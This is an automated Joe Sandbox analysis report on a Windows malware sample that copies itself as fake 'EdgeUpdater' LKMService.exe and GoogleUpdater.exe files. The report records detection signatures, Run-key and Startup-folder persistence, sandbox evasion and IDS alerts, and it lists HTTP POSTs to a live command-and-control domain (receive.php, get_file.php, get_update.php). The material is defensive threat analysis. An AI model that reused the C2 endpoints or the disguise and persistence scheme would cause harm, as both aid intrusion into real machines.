Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524651
MD5:f37e0267c53ae8e94fe38e87524b8c45
SHA1:facaa93a619ab87da8ac448dd1fc71fb72e5380e
SHA256:3ecf0a5fdc66d37c9e726334a0e57d6dc1e3ab622653d032f8db827185cc7c80
Tags:exeuser-Bitsight
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates multiple autostart registry keys
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: New RUN Key Pointing to Suspicious Folder
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3560 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)
    • LKMService.exe (PID: 800 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)
      • GoogleUpdater.exe (PID: 1032 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker MD5: F37E0267C53AE8E94FE38E87524B8C45)
  • LKMService.exe (PID: 3172 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)
    • WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • GoogleUpdater.exe (PID: 884 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)
    • WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • LKMService.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)
    • WerFault.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • GoogleUpdater.exe (PID: 6280 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)
    • WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_047c5762224547e8b0906f5148be419e
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_047c5762224547e8b0906f5148be419e
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3560, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-03T03:26:15.106582+020028033053Unknown Traffic192.168.2.649715172.67.74.15280TCP
2024-10-03T03:26:47.122039+020028033053Unknown Traffic192.168.2.649715172.67.74.15280TCP
2024-10-03T03:26:48.278282+020028033053Unknown Traffic192.168.2.649715172.67.74.15280TCP
2024-10-03T03:27:20.653255+020028033053Unknown Traffic192.168.2.652918104.26.12.20580TCP
2024-10-03T03:27:22.080885+020028033053Unknown Traffic192.168.2.652918104.26.12.20580TCP
2024-10-03T03:27:54.825124+020028033053Unknown Traffic192.168.2.652923104.26.12.20580TCP
2024-10-03T03:27:56.022740+020028033053Unknown Traffic192.168.2.652925104.26.12.20580TCP
2024-10-03T03:28:02.137640+020028033053Unknown Traffic192.168.2.652926104.26.12.20580TCP
2024-10-03T03:28:03.435784+020028033053Unknown Traffic192.168.2.652928104.26.12.20580TCP
2024-10-03T03:28:24.997014+020028033053Unknown Traffic192.168.2.652932104.26.12.20580TCP
2024-10-03T03:28:26.590789+020028033053Unknown Traffic192.168.2.652934104.26.12.20580TCP
2024-10-03T03:28:29.090755+020028033053Unknown Traffic192.168.2.652937104.26.12.20580TCP
2024-10-03T03:28:30.647857+020028033053Unknown Traffic192.168.2.652939104.26.12.20580TCP
2024-10-03T03:28:34.834966+020028033053Unknown Traffic192.168.2.652942104.26.12.20580TCP
2024-10-03T03:28:37.434515+020028033053Unknown Traffic192.168.2.652944104.26.12.20580TCP
2024-10-03T03:28:42.604352+020028033053Unknown Traffic192.168.2.652948104.26.12.20580TCP
2024-10-03T03:28:43.997048+020028033053Unknown Traffic192.168.2.652950104.26.12.20580TCP
2024-10-03T03:28:48.497039+020028033053Unknown Traffic192.168.2.652953104.26.12.20580TCP
2024-10-03T03:28:49.793905+020028033053Unknown Traffic192.168.2.652955104.26.12.20580TCP
2024-10-03T03:29:22.098503+020028033053Unknown Traffic192.168.2.652958104.26.12.20580TCP
2024-10-03T03:29:23.611617+020028033053Unknown Traffic192.168.2.652960104.26.12.20580TCP
2024-10-03T03:29:55.934540+020028033053Unknown Traffic192.168.2.652964104.26.12.20580TCP
2024-10-03T03:29:57.044562+020028033053Unknown Traffic192.168.2.652966104.26.12.20580TCP
2024-10-03T03:29:58.796662+020028033053Unknown Traffic192.168.2.652967104.26.12.20580TCP
2024-10-03T03:30:00.325209+020028033053Unknown Traffic192.168.2.652969104.26.12.20580TCP
2024-10-03T03:30:09.503073+020028033053Unknown Traffic192.168.2.652972104.26.12.20580TCP
2024-10-03T03:30:11.138172+020028033053Unknown Traffic192.168.2.652974104.26.12.20580TCP
2024-10-03T03:30:20.325250+020028033053Unknown Traffic192.168.2.652974104.26.12.20580TCP
2024-10-03T03:30:21.326164+020028033053Unknown Traffic192.168.2.652974104.26.12.20580TCP
2024-10-03T03:30:53.325187+020028033053Unknown Traffic192.168.2.652974104.26.12.20580TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://yalubluseks.eu/get_updatXVirustotal: Detection: 7%Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeVirustotal: Detection: 23%Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeVirustotal: Detection: 23%Perma Link
Source: file.exeReversingLabs: Detection: 18%
Source: file.exeVirustotal: Detection: 23%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeJoe Sandbox ML: detected
Source: file.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52933 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52954 version: TLS 1.2
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb=" source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbTM source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbon n source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 3{C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb_+f source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL}) source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs' source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m0C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb( source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb`V source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbt source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB0 source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbrL source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.PDBgi~m source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\LKSM.pdbo+v source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb35$ source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdbte source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor$ source: GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: {%%.pdb source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdbSe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdbN source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source: Binary string: \??\C:\Windows\System.Core.pdby source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbV source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb%&, source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor4 source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: m0C:\Windows\mscorlib.pdby source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb ~, source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: osymbols\dll\mscorlib.pdbLb source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb-Vs source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb9 source: GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: LKSM.pdb< source: WER951D.tmp.dmp.17.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tLKSM.pdbpo source: LKMService.exe, 0000000F.00000002.2519054896.00000000007B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdbps source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\LKSM.pdbpdbKSM.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: LKSM.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe6 source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@=B source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbo source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb/# source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdbti source: WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbY= source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbt source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb# source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: System.pdb4 source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb3 source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdb source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb**# source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\Temp\EdgeUpdaterJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeJump to behavior
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
